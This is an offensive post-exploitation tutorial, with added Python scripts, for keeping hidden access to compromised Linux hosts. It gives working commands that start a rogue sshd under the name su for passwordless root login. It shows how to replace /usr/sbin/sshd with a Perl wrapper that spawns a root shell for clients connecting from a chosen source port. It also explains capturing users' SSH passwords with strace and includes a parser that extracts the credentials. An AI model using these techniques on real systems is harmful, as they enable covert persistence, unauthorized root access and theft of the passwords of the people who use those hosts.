Tips for the rookie administrator.
1. You have a shell on the compromised host, the target's firewall imposes no restrictions, and you want to quickly open an SSH port you can reach.
Run on the compromised host:
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
This forks a second sshd listening on port 31337. Connect to that port and log in with root, bin, ftp or mail as the user name and password. The trick is that sshd derives its PAM service name from argv[0]: started under the name su it is authenticated against /etc/pam.d/su, and on distributions where that file begins with auth sufficient pam_rootok.so the root-owned sshd accepts the login without checking the password. The extra sshd does not survive a reboot and is visible in ps and ss -ltnp, so treat it as a quick temporary foothold only.
2. An SSH wrapper backdoor. This works better than the first tip: it opens no extra port, and as long as the target keeps its SSH service enabled you can connect to the backdoor remotely.
Run on the compromised host:
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart
How it works: sshd re-executes itself for every accepted connection with the client socket as its standard input, so the Perl wrapper now sitting at /usr/sbin/sshd sees the connection on STDIN. getpeername(STDIN) returns the client's raw struct sockaddr: two bytes of address family followed by the client's source port in network byte order. The regex /^..4A/ skips the family bytes and matches the port bytes 0x34 0x41, that is 13377. A client connecting from that source port gets /bin/sh on the socket; every other client is handed to the real sshd, which was moved to /usr/bin/sshd (it is exec'd with argv[0] still set to /usr/sbin/sshd, so its own re-exec keeps going through the wrapper). Bear in mind that the replaced binary is now a plain Perl script, so file /usr/sbin/sshd, rpm -V openssh-server or debsums reveals it at once.
From your own machine, connect with a fixed source port:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
To use a different source port, compute its two-byte big-endian encoding with Python's struct module and put those bytes into the wrapper's regex in place of 4A. The session below packs a 4-byte integer ('>I'), so the first two bytes are always zero and the last two are the port:
>>> import struct
>>> buffer = struct.pack('>I', 19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I', 13377)
>>> print buffer
4A
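The following Python 3 script is an added example, not code from the original post. It generalises the struct.pack step to any port and checks the resulting pattern against a peer address the way the wrapper does. It assumes the Linux layout of struct sockaddr_in on a little-endian host (2-byte sin_family in host order, then sin_port in network order, then sin_addr), which is why the wrapper's regex skips two bytes with .. before the port; the function names are the example's own.

```python
import re
import socket
import struct


def port_bytes(port):
    """Two big-endian bytes of a TCP port: 13377 -> b'4A', 19526 -> b'LF'.
    These are the only informative bytes of the page's struct.pack('>I', port)."""
    if not 0 <= port <= 0xFFFF:
        raise ValueError("port out of range: %r" % port)
    return struct.pack(">H", port)


def perl_regex_for_port(port):
    """Pattern for the wrapper's getpeername() test: '^..' skips sin_family,
    then the two port bytes follow literally. Bytes that are not ASCII letters
    or digits are written as \\xNN so the Perl regex stays valid for any port
    (for example 1337 = 0x0539 -> '^..\\x059')."""
    parts = []
    for b in port_bytes(port):
        if 0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A:
            parts.append(chr(b))
        else:
            parts.append("\\x%02x" % b)
    return "^.." + "".join(parts)


def linux_sockaddr_in(ip, port):
    """struct sockaddr_in as getpeername() fills it in on a little-endian Linux
    host (assumed layout: 2-byte sin_family in host order, 2-byte sin_port in
    network order, 4-byte sin_addr, 8 bytes of zero padding)."""
    return (struct.pack("<H", socket.AF_INET)
            + struct.pack(">H", port)
            + socket.inet_aton(ip)
            + b"\x00" * 8)


def wrapper_spawns_shell(peer_sockaddr, backdoor_port):
    """Emulate the Perl test getpeername(STDIN) =~ /^..4A/; Python's re reads
    the ^ . and \\xNN syntax used here the same way Perl does."""
    pattern = perl_regex_for_port(backdoor_port).encode("ascii")
    return re.match(pattern, peer_sockaddr) is not None


if __name__ == "__main__":
    for p in (13377, 19526, 31337, 1337):
        print(p, port_bytes(p), perl_regex_for_port(p))
    peer = linux_sockaddr_in("10.18.180.20", 13377)
    print(wrapper_spawns_shell(peer, 13377))   # this client gets /bin/sh
    print(wrapper_spawns_shell(peer, 31337))   # this client goes to the real sshd
```

Pick a port whose two bytes are both letters or digits (13377 gives "4A", 31337 gives "zi") if you want the wrapper line to stay readable; otherwise paste the escaped form the script prints.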
3. Record the passwords typed into the SSH client
Once you own a host you often want to capture the passwords its users type when they ssh on to other machines, so as to extend the compromise; the strace command is all you need.
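As an added example, not the original post's command, here is a Python 3 script that pulls credentials out of such a trace. It assumes the log was produced with strace -o /tmp/.ssh.log -e trace=read,write,connect -s 2048 ssh user@host (the page does not show its exact invocation) and that the client is OpenSSH, which prompts with "user@host's password: " and then reads the terminal one byte at a time with echo off. The sample log embedded in the script is constructed, not a real capture, and the function names are the example's own.

```python
import re

# Constructed sample strace log (not a real capture). It mimics the output of
#   strace -o /tmp/.ssh.log -e trace=read,write,connect -s 2048 ssh root@10.18.180.20
# That invocation is an assumption; the page only says to use strace.
SAMPLE_LOG = """\
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("10.18.180.20")}, 16) = 0
write(4, "root@10.18.180.20's password: ", 30) = 30
read(4, "h", 1) = 1
read(4, "u", 1) = 1
read(4, "n", 1) = 1
read(4, "t", 1) = 1
read(4, "e", 1) = 1
read(4, "r", 1) = 1
read(4, "2", 1) = 1
read(4, "\\n", 1) = 1
read(0, "l", 16384) = 1
read(0, "s", 16384) = 1
read(0, "\\r", 16384) = 1
"""

# OpenSSH writes "user@host's password: " and then reads the tty one byte at a
# time, so the password shows up as a run of `read(fd, "c", 1) = 1` lines that
# ends at "\n" or "\r". Ordinary session keystrokes are read into a large
# buffer (`read(0, "l", 16384) = 1`) and therefore never match.
PASSWORD_PROMPT = re.compile(r'''^write\((\d+), "([^"]+)'s password: ", \d+\) = \d+$''')
SINGLE_BYTE_READ = re.compile(r'^read\((\d+), "(.*)", 1\) = 1$')


def unescape_strace(s):
    """Undo strace's C-style escapes such as \\t, \\033 and an escaped quote."""
    return s.encode("latin-1").decode("unicode_escape")


def credentials_from_strace(log_text):
    """Return [(target, password), ...] found in an strace log of an ssh client."""
    prompts = {}   # fd -> "user@host" from the last password prompt written on it
    typed = {}     # fd -> characters collected so far from 1-byte reads
    found = []
    for line in log_text.splitlines():
        m = PASSWORD_PROMPT.match(line)
        if m:
            prompts[m.group(1)] = m.group(2)
            typed[m.group(1)] = ""
            continue
        m = SINGLE_BYTE_READ.match(line)
        if not m:
            continue
        fd, ch = m.group(1), m.group(2)
        if ch in ("\\n", "\\r"):
            if typed.get(fd):
                found.append((prompts.get(fd, "?"), unescape_strace(typed[fd])))
            typed[fd] = ""
            continue
        typed[fd] = typed.get(fd, "") + ch
    return found


if __name__ == "__main__":
    for target, password in credentials_from_strace(SAMPLE_LOG):
        print("%s  %s" % (target, password))
```

Because the trace set does not include open(), the script cannot know in advance which descriptor is the tty; it keys on the 1-byte read size instead, which is also what separates the password from the session keystrokes that ssh reads into a 16 KiB buffer. Passwords entered through a non-OpenSSH client or an askpass helper will not appear in the log this way.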